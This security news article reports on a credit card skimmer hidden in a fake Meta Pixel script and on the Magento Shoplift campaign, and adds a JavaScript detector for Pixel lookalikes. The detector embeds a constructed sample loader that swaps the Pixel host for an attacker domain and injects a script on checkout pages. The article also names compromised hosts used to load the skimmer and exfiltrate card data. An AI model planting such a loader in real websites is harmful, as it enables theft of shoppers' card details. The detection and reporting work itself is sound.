Cybersecurity researchers have discovered a credit card skimmer hidden inside a fake Meta Pixel tracking script in an attempt to evade detection.
Sucuri said the malware is injected into websites via tools that allow custom code, such as WordPress plugins like Simple Custom CSS and JS or the “Miscellaneous Scripts” section of the Magento admin panel.
“Custom script editors are popular with bad actors because they allow external third-party (and malicious) JavaScript and can easily pretend to be benign by exploiting naming conventions that match popular scripts like Google Analytics or libraries like jQuery,” said security researcher Matt Morrow.
The fake Meta Pixel tracking script identified by the web security firm contains elements similar to its legitimate counterpart, but closer inspection reveals added JavaScript code that replaces references to the “connect.facebook[.]net” domain with “b-connected[.]com.”
While the former is a genuine domain linked to the Pixel tracking feature, the replacement domain is used to load an additional malicious script (“fbevents.js”) that monitors whether a victim is on a payment page and, if so, serves a fraudulent overlay to capture credit card details.
It is worth noting that “b-connected[.]com” is a legitimate e-commerce site that was compromised at some point to host the skimmer code. Additionally, the information entered into the fake form is exfiltrated to another compromised site (“www.donjuguetes[.]es”).
To mitigate these risks, site owners are advised to keep their sites updated, periodically review administrator accounts to confirm that all of them are legitimate, and rotate passwords frequently.
This is especially important since threat actors are known to exploit weak passwords and flaws in WordPress plugins to gain elevated access to a target site and add unauthorized administrator users, who are then used to perform various other tasks, including adding additional plugins and backdoors.
“Because credit card thieves often wait for keywords like ‘checkout’ or ‘onepage,’ they may not become visible until the checkout page loads,” Morrow said.
“Because most checkout pages are dynamically generated based on cookie data and other variables passed to the page, these scripts evade public scanners, and the only way to identify the malware is to check the source of the page or observe network traffic. These scripts run silently in the background.”
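Because the skimmer described above only differs from a real Pixel snippet in the host it loads fbevents.js from and in its wait for a checkout URL, a page-source review can be scripted. The following is an added example, not code from Sucuri or from the article; it audits inline script bodies for a Pixel lookalike that references a host other than connect.facebook.net and for checkout/onepage gating, and both sample script bodies are constructed for this example.

```javascript
// Added example, not from Sucuri's report: audit inline scripts for a Meta
// Pixel lookalike whose fbevents.js loader resolves to a host other than
// connect.facebook.net, and for the checkout/onepage URL gating the article
// describes. Both sample script bodies below are constructed for this example.
const LEGIT_PIXEL_HOST = "connect.facebook.net";
const CHECKOUT_KEYWORDS = ["checkout", "onepage"];
const NOT_HOST_SUFFIXES = new Set(["js", "css", "json", "html", "php"]);

// Collect host names that appear after "//" or at the start of a string literal,
// so a host swapped in via .replace("connect.facebook.net", "...") is caught too.
function extractHosts(scriptText) {
  const hosts = new Set();
  const re = /(?:\/\/|["'`])([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  let m;
  while ((m = re.exec(scriptText)) !== null) {
    const host = m[1].toLowerCase();
    const tld = host.slice(host.lastIndexOf(".") + 1);
    // Skip file names such as fbevents.js that look like a host to the regex.
    if (/^[a-z]{2,}$/.test(tld) && !NOT_HOST_SUFFIXES.has(tld)) hosts.add(host);
  }
  return [...hosts];
}

// Report whether a script looks like the Pixel loader, which non-Facebook hosts
// it references, and whether it keys its behaviour on a checkout page URL.
function auditPixelScript(scriptText) {
  const pixelLike = /fbq\s*\(|fbevents\.js/.test(scriptText);
  if (!pixelLike) return { pixelLike, unexpectedHosts: [], checkoutTrigger: false };
  const unexpectedHosts = extractHosts(scriptText).filter((h) => h !== LEGIT_PIXEL_HOST);
  const keywordRe = new RegExp(CHECKOUT_KEYWORDS.join("|"), "i");
  const checkoutTrigger = /\blocation\b/.test(scriptText) && keywordRe.test(scriptText);
  return { pixelLike, unexpectedHosts, checkoutTrigger };
}

// Constructed sample: a genuine-looking Pixel snippet.
const LEGIT_PIXEL = `!function(f,b,e,v,n,t,s){t=b.createElement(e);t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init','1234567890');fbq('track','PageView');`;

// Constructed sample: the lookalike pattern described in the article, swapping the
// loader host (b-connected.com is the host the article names) and waiting for a checkout URL.
const FAKE_PIXEL = `var s=document.createElement('script');
s.src='https://connect.facebook.net/en_US/fbevents.js'.replace('connect.facebook.net','b-connected.com');
if(/checkout|onepage/i.test(location.href)){document.head.appendChild(s);}`;

console.log(JSON.stringify(auditPixelScript(LEGIT_PIXEL)));
console.log(JSON.stringify(auditPixelScript(FAKE_PIXEL)));
```

Run it against each inline `<script>` body and each custom-code plugin entry; a Pixel-like script with a non-empty `unexpectedHosts` list is the thing to inspect first, and network traffic to that host on the checkout page confirms the finding.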
The development comes as Sucuri also revealed that sites built with WordPress and Magento are being targeted by another malware campaign called Magento Shoplift. Previous variants of Magento Shoplift have been observed in circulation since September 2023.
The attack chain begins with the insertion of an obfuscated JavaScript snippet into a legitimate JavaScript file, which is responsible for loading a second script from jqueurystatics[.]com via WebSocket Secure (WSS); that second script, in turn, is designed to facilitate credit card skimming and data theft while masquerading as Google Analytics scripts.
“WordPress has also become a major player in e-commerce, thanks to the adoption of WooCommerce and other plugins that can easily transform a WordPress site into a full-featured online store,” said researcher Puja Srivastava.
“This popularity also makes WordPress stores a prime target, and attackers are modifying their Magecart e-commerce malware to target a broader range of CMS platforms.”